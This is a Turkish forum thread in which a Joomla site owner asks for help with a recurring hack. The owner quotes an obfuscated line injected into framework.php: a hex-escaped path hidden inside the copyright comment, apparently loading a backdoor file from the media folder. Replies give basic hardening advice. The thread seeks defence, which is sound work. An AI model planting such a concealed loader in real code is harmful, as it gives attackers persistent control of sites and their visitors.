BT_arise teması kullandığım sitemde son iki haftadır üçüncü kere yaşadığım bir sorun bu: Sitenin yönetim paneline girebiliyorum ama site 404 hatası veriyor.
FTP'den bakınca index. php'nin silinmiş olduğunu fark ediyorum. Yedeğini yüklüyorum ama bu sefer de "includes" klasöründeki framework.php de bir sorun olduğuna dair bir hata mesajı alıyorum.
Framework.php içine aşağıda altı çizili olarak gösterdiğim kodun eklendiğini fark ediyorum.
* @copyrigh*/"\x2fhom\x65/ms\x6ccay\x6ba/p\x75bli\x63_ht\x6dl/m\x65dia\x2fcon\x74act\x73/im\x61ges\x2faja\x78.ph\x70";/*t Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
Tabii kodu silip düzeltince site tekrar çalışıyor ama bir süre sonra aynı şey tekrar oluyor. Bir hack durumu söz konusu sanırım.
Bu durumdan nasıl kurtulabilirim, daha önce bu tür bir saldırı yaşayan ve çözüm üreten oldu mu?
şimdiden teşekkürler.
Joomla siteyi bir saldırıdan nasıl korurum (framework.php ye eklenen kod)
6
●668
- 10-11-2016, 17:23:23Cevap için teşekkürler.muratyil adlı üyeden alıntı: mesajı görüntüle
FTP şifresini, admin panel kullanıcı adı ve şifresini değiştirmeyi ancak dün akıl edebildim. Bu şekilde bir süre takip edeceğim. Yalnız Cpanelden admin klasörünü şifrelemek demişsiniz, bunu daha önce duymamıştım. Cpanelde nereden yapılıyor bu işlem, yönlendirirseniz çok sevinirim. - 25-01-2017, 23:02:54sitenizde açıklardan faydalanarak kullanıcılar oluşmaya başlamış olabilir. Kullanıcılar bölümüne bir göz atın, spam kullanıcılar var ise silin ve eğer üyelik gerekmiyorsa da siteniz için seçenekler bölümünden üye kaydını durdurun. Form bileşenleri kullanıyorsanız google rechapta edinip sitenize pluginslere entegre etmelisiniz.